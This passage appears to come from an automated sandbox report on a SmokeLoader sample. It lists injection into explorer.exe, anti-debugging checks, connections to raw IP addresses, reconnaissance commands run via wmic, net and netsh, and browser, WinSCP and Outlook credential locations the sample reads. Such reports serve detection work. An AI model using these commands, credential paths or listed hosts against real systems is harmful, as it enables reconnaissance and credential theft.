Data Execution Prevention Available: Yes\r\n3273417056311350223273417056\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>Class 3 Public Primary Certification Authority","from":"1997-04-17 00:00:00 000","expire":"2016-10-24 23:59:59 000","obj_id":"1.2.840.113549.1.1.1"},{"name":"Microsoft Windows Hardware Compatibility","subject":"OU=Copyright (c) 1997 Microsoft Corp., OU=Microsoft Windows Hardware Compatibility Intermediate CA, OU=Microsoft Corporation, CN=Microsoft Windows Hardware Compatibility","issuer":"OU=Copyright (c) 1997 Microsoft Corp., OU=Microsoft Corporation, CN=Microsoft Root A
Source: explorer.exe, 00000001.00000000.1763817484.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1760642789.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: ROUTE.EXE, 00000022.00000002.3032501499.00000210BAC49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000001.00000000.1760642789.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\v173TV3V11.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\v173TV3V11.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\v173TV3V11.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bsjhhuh	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C35.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vejhhuh	System information queried: CodeIntegrityInformation	Jump to behavior

Source: C:\Users\user\Desktop\v173TV3V11.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vejhhuh	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 16_2_034A1B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,

16_2_034A1B17

Source: C:\Windows\SysWOW64\explorer.exe

16_2_034A1016

Source: C:\Users\user\AppData\Local\Temp\451E.exe

Code function: 9_2_00007FF763AF78EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,

9_2_00007FF763AF78EC

Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_006B092B mov eax, dword ptr fs:[00000030h]	0_2_006B092B
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_006B0D90 mov eax, dword ptr fs:[00000030h]	0_2_006B0D90
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_009110B3 push dword ptr fs:[00000030h]	0_2_009110B3
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_006C092B mov eax, dword ptr fs:[00000030h]	5_2_006C092B
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_006C0D90 mov eax, dword ptr fs:[00000030h]	5_2_006C0D90
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_006F049B push dword ptr fs:[00000030h]	5_2_006F049B
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_006B092B mov eax, dword ptr fs:[00000030h]	6_2_006B092B
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_006B0D90 mov eax, dword ptr fs:[00000030h]	6_2_006B0D90
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_008B0FC4 push dword ptr fs:[00000030h]	6_2_008B0FC4
Source: C:\Users\user\AppData\Roaming\vejhhuh	Code function: 8_2_0067092B mov eax, dword ptr fs:[00000030h]	8_2_0067092B
Source: C:\Users\user\AppData\Roaming\vejhhuh	Code function: 8_2_00670D90 mov eax, dword ptr fs:[00000030h]	8_2_00670D90
Source: C:\Users\user\AppData\Roaming\vejhhuh	Code function: 8_2_0076011C push dword ptr fs:[00000030h]	8_2_0076011C

Source: C:\Users\user\AppData\Local\Temp\451E.exe

Code function: 9_2_00007FF763AF2654 GetProcessHeap,RtlReAllocateHeap,

9_2_00007FF763AF2654

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: vejhhuh.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 190.219.117.240 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 201.212.52.197 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 23.145.40.162 443	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\v173TV3V11.exe	Thread created: C:\Windows\explorer.exe EIP: 88019A8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Thread created: unknown EIP: 7D919A8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Thread created: unknown EIP: 9071970	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vejhhuh	Thread created: unknown EIP: 1421970	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\explorer.exe	Memory written: PID: 6916 base: E379C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 4900 base: 7FF72B812D10 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 2176 base: E379C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 5368 base: 7FF72B812D10 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 3588 base: E379C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 5268 base: 7FF72B812D10 value: 90	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\v173TV3V11.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\v173TV3V11.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vejhhuh	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vejhhuh	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: E379C0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: E379C0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: E379C0	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Code function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe		19_2_00551016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe		19_2_005510A5

Source: C:\Users\user\AppData\Local\Temp\451E.exe	Process created: C:\Windows\System32\cmd.exe cmd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ROUTE.EXE route print	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall show state	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net accounts /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net share	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net user	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 accounts /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 share
Source: C:\Windows\System32\net.exe	Process created: unknown unknown

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv			Jump to behavior

Source: explorer.exe, 00000001.00000000.1763817484.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1761929514.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1760942805.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1760942805.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1760642789.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1760942805.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1760942805.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 11_2_008555EB cpuid

11_2_008555EB

Source: C:\Users\user\AppData\Local\Temp\451E.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\v173TV3V11.exe

Code function: 0_2_00419FC0 GetVolumeInformationA,InterlockedCompareExchange,GetFocus,ReadConsoleW,FindAtomW,SetConsoleMode,GetDefaultCommConfigA,CopyFileW,CreatePipe,GetEnvironmentStrings,WriteConsoleOutputA,GetModuleFileNameA,GetSystemTimeAdjustment,ObjectPrivilegeAuditAlarmA,WaitForSingleObject,SetCommState,GetConsoleAliasesLengthW,GetComputerNameA,CopyFileW,GetFileAttributesA,GetConsoleAliasExesLengthA,GetBinaryType,FormatMessageA,GetLongPathNameA,GetCommTimeouts,LoadLibraryA,MoveFileA,InterlockedCompareExchange,

0_2_00419FC0

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 11_2_00802198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,

11_2_00802198

Source: C:\Users\user\AppData\Local\Temp\451E.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh firewall show state

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh firewall show state

Source: 451E.exe, 00000009.00000003.2927136148.000002E002E34000.00000004.00000020.00020000.00000000.sdmp, 451E.exe, 00000009.00000003.2927592890.000002E002E41000.00000004.00000020.00020000.00000000.sdmp, 451E.exe, 00000009.00000003.2654320781.000002E002E34000.00000004.00000020.00020000.00000000.sdmp, 451E.exe, 00000009.00000003.3322030879.000002E002E3B000.00000004.00000020.00020000.00000000.sdmp, 451E.exe, 00000009.00000003.3322167908.000002E002E41000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\451E.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\451E.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\451E.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000011.00000002.4175265628.0000000000F61000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5368, type: MEMORYSTR
Source: Yara match	File source: 6.2.C35.exe.6b0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.C35.exe.6c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.C35.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vejhhuh.670e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vejhhuh.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.vejhhuh.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2024427682.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2264399369.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2315604310.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1780526952.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1780608383.0000000000801000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2561731311.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2561826979.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2510328595.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2315554860.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\451E.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000011.00000002.4175265628.0000000000F61000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5368, type: MEMORYSTR
Source: Yara match	File source: 6.2.C35.exe.6b0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.C35.exe.6c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.C35.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vejhhuh.670e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vejhhuh.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.vejhhuh.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2024427682.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2264399369.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2315604310.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1780526952.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1780608383.0000000000801000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2561731311.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2561826979.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2510328595.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2315554860.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Disable or Modify Tools	1 OS Credential Dumping	11 System Time Discovery	Remote Services	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	11 Native API	Boot or Logon Initialization Scripts	522 Process Injection	1 Deobfuscate/Decode Files or Information	11 Input Capture	3 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	1 Credentials in Registry	249 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Command and Scripting Interpreter	Login Hook	Login Hook	12 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	11 Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	781 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	34 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	34 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	522 Process Injection	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
v173TV3V11.exe	100%	Avira	HEUR/AGEN.1312571
v173TV3V11.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\C35.exe	100%	Avira	HEUR/AGEN.1312571
C:\Users\user\AppData\Roaming\bsjhhuh	100%	Avira	HEUR/AGEN.1312571
C:\Users\user\AppData\Roaming\vejhhuh	100%	Avira	HEUR/AGEN.1312571
C:\Users\user\AppData\Local\Temp\451E.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\C35.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\bsjhhuh	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\vejhhuh	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\451E.exe	37%	ReversingLabs	Win64.Trojan.Generic
C:\Users\user\AppData\Roaming\bsjhhuh	29%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
calvinandhalls.com	5%	Virustotal	Browse
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
nwgrus.ru	12%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
